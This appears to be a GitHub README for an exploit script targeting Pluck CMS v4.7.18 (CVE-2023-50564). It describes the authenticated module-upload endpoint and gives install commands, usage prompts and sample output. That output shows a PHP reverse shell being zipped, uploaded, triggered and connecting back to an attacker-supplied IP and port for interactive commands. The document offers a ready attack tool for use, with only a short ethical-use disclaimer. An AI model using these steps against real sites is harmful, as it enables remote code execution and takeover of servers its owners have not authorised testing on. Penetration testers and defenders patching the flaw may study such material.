This script exploits an authenticated arbitrary file upload vulnerability in Pluck CMS v4.7.18 (CVE-2023-50564). By leveraging this vulnerability, an authenticated attacker can upload a malicious PHP file, enabling the execution of arbitrary code (in this case, a reverse shell).
- CVE ID: CVE-2023-50564
- Affected Version: Pluck CMS v4.7.18
- Type: Authenticated Arbitrary File Upload
- Impact: Remote Code Execution (RCE)
The vulnerability exists in the /admin.php?action=installmodule endpoint, which allows an authenticated user to upload a ZIP file containing arbitrary files. By uploading a malicious PHP file, this exploit establishes a reverse shell back to the attacker.
- Python 3.x
- requests module:
pip install requests - requests-toolbelt module:
pip install requests-toolbelt
This script also requires a valid login for the Pluck CMS instance, including the target's URL and password.
- Reverse Shell: The exploit uploads a PHP reverse shell to the target and connects back to the attacker's machine.
- Interactive Command Execution: Once the reverse shell is established, commands can be executed interactively on the target.
- Password Prompt Detection: The exploit detects password prompts (e.g.,
su,sudo -l) and allows the user to provide input manually.
- Clone the Repository:
git clone https://github.com/yourusername/Pluck-CMS-Exploit.git cd Pluck-CMS-Exploit - Install Required Python Packages: Make sure the required packages are installed:
pip install requests requests-toolbelt- Run the Exploit: The script requires four inputs: target URL, the CMS password, your IP address (for the reverse shell), and the port on which you want to listen.
Run the exploit using Python:
python3 exploit.py- Provide Input When Prompted:
- Enter the target URL (e.g., example.com).
- Enter the password for authentication on the CMS.
- Enter your IP address for the reverse shell connection.
- Enter the port for listening to the reverse shell.
- Interactive Shell: Once the reverse shell is established, you'll be presented with a Shell> prompt to interact with the target system.
Example:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data- Authentication: The script logs into the CMS using the provided credentials.
- File Upload: It creates a ZIP archive containing a PHP reverse shell and uploads it to the vulnerable endpoint (/admin.php?action=installmodule).
- Reverse Shell: The script triggers the uploaded PHP file, establishing a reverse shell connection back to the attacker's machine.
- CVE ID: CVE-2023-50564
- Vulnerable Endpoint: /admin.php?action=installmodule
- Vulnerable Version: Pluck CMS v4.7.18
- Type: Authenticated Arbitrary File Upload
This script is intended for educational purposes and ethical hacking. It should only be used in environments where you have explicit permission to test. The author is not responsible for any misuse of this tool.
This project is licensed under the MIT License - see MIT License for details.
Feel free to fork the repository and submit pull requests. For any issues or feature requests, please open an issue on GitHub.